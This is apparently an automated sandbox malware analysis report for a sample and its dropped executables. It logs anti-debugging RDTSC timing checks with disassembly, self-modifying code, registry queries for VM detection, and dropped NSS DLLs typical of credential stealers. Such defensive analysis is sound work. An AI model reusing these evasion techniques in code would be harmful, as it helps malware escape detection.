Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C0C second address: 4AB0C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2D807904B1h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2D807904B4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C3F second address: 4AB0C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C43 second address: 4AB0C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C49 second address: 4AB0C8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2D810C1E5Ch 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F2D810C1E5Bh 0x0000000f xor cl, 0000007Eh 0x00000012 jmp 00007F2D810C1E69h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov edx, 153D00DEh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C8F second address: 4AB0C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C95 second address: 4AB0C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C99 second address: 4AB0C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9B7DA4 second address: 9B7DAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BCE9F second address: 9BCEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F2D807904AAh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BCEB4 second address: 9BCEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BCEBB second address: 9BCEC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2D807904A6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BCEC8 second address: 9BCEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F2D810C1E62h 0x0000000b jg 00007F2D810C1E56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BD489 second address: 9BD495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F2D807904A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BD495 second address: 9BD49B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BD49B second address: 9BD4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2D807904B4h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BD4CF second address: 9BD4E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F2D810C1E5Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BD643 second address: 9BD673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2D807904B8h 0x0000000b jmp 00007F2D807904B1h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BD673 second address: 9BD683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2D810C1E56h 0x0000000a je 00007F2D810C1E56h 0x00000010 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF22A second address: 9BF268 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 26022900h 0x0000000f mov dword ptr [ebp+122D300Bh], edx 0x00000015 lea ebx, dword ptr [ebp+1245404Eh] 0x0000001b mov dword ptr [ebp+122D2891h], edx 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F2D807904B5h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF343 second address: 9BF349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF349 second address: 9BF34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF34E second address: 9BF353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF3C3 second address: 9BF406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 jmp 00007F2D807904ADh 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D3846h], eax 0x00000015 call 00007F2D807904A9h 0x0000001a jmp 00007F2D807904B7h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF406 second address: 9BF411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2D810C1E56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF411 second address: 9BF423 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF423 second address: 9BF42A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF42A second address: 9BF462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a jmp 00007F2D807904AFh 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2D807904B8h 0x0000001b rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF462 second address: 9BF4BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2D810C1E58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov di, cx 0x00000010 call 00007F2D810C1E60h 0x00000015 mov cx, ax 0x00000018 pop edx 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F2D810C1E58h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 push 00000000h 0x00000037 push 00000003h 0x00000039 pushad 0x0000003a sbb al, FFFFFFCAh 0x0000003d mov ebx, edx 0x0000003f popad 0x00000040 push 4514DA25h 0x00000045 pushad 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF4BC second address: 9BF518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B1h 0x00000009 popad 0x0000000a jmp 00007F2D807904ACh 0x0000000f popad 0x00000010 add dword ptr [esp], 7AEB25DBh 0x00000017 mov dword ptr [ebp+122D1E32h], edx 0x0000001d mov dword ptr [ebp+122D27F3h], ebx 0x00000023 lea ebx, dword ptr [ebp+12454062h] 0x00000029 jmp 00007F2D807904B6h 0x0000002e push eax 0x0000002f pushad 0x00000030 push esi 0x00000031 pushad 0x00000032 popad 0x00000033 pop esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF518 second address: 9BF51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9BF51C second address: 9BF520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9D1CE3 second address: 9D1CE9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9D1CE9 second address: 9D1CEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DD4B4 second address: 9DD4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DD8B9 second address: 9DD8C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 js 00007F2D807904A6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DD8C9 second address: 9DD8D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F2D810C1E56h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DD8D7 second address: 9DD8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DD8DB second address: 9DD8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DDF12 second address: 9DDF18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DDF18 second address: 9DDF1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DE06E second address: 9DE09F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904ACh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2D807904AFh 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edx 0x00000018 jnp 00007F2D807904B2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DE09F second address: 9DE0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2D810C1E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2D810C1E67h 0x00000011 js 00007F2D810C1E56h 0x00000017 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DE389 second address: 9DE3A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2D807904B0h 0x0000000d jo 00007F2D807904A6h 0x00000013 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DE3A7 second address: 9DE413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E65h 0x00000007 jnp 00007F2D810C1E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F2D810C1E66h 0x00000017 jmp 00007F2D810C1E67h 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jmp 00007F2D810C1E5Dh 0x00000026 pop ebx 0x00000027 jno 00007F2D810C1E5Ah 0x0000002d rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DE692 second address: 9DE699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DE699 second address: 9DE6AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F2D810C1E56h 0x00000009 jo 00007F2D810C1E56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DEBFD second address: 9DEC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DEC01 second address: 9DEC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DEC07 second address: 9DEC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2D807904B0h 0x0000000b rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DEC1D second address: 9DEC23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DEC23 second address: 9DEC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9DEC27 second address: 9DEC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9B2C1F second address: 9B2C55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2D807904AFh 0x0000000b jc 00007F2D807904B8h 0x00000011 jmp 00007F2D807904B0h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pushad 0x00000019 jbe 00007F2D807904A6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9E3B49 second address: 9E3B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9E223B second address: 9E223F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9E223F second address: 9E2249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9E2249 second address: 9E224D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9A6EDE second address: 9A6EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Fh 0x00000009 popad 0x0000000a js 00007F2D810C1E5Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9A6EFC second address: 9A6F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9E9F1F second address: 9E9F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA1E2 second address: 9EA1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA1E6 second address: 9EA1EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA1EA second address: 9EA1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2D807904A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F2D807904A6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA1FE second address: 9EA212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA212 second address: 9EA22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B5h 0x00000009 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA52B second address: 9EA53E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA699 second address: 9EA6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F2D807904A6h 0x0000000d rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA7FA second address: 9EA816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D810C1E66h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA816 second address: 9EA81A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9EA81A second address: 9EA829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007F2D810C1E56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9B480E second address: 9B4845 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2D807904A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F2D807904ACh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2D807904B6h 0x00000019 jng 00007F2D807904A6h 0x0000001f rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9B4845 second address: 9B485A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2D810C1E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F2D810C1E56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9B485A second address: 9B4866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9B4866 second address: 9B486C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9ED41B second address: 9ED430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D807904B1h 0x00000009 rdtsc
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	RDTSC instruction interceptor: First address: 9ED4C8 second address: 9ED4CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 91027B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 76FAD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Special instruction interceptor: First address: 83ED02 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Special instruction interceptor: First address: 83EDCD instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Special instruction interceptor: First address: A08D10 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Special instruction interceptor: First address: 83ECBD instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Special instruction interceptor: First address: A69B69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B6ED02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B6EDCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: D38D10 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B6ECBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: D99B69 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Memory allocated: 1060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Memory allocated: 1AD40000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Documents\DGCAAFBFBK.exe

Code function: 20_2_053D07A0 rdtsc

20_2_053D07A0

Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
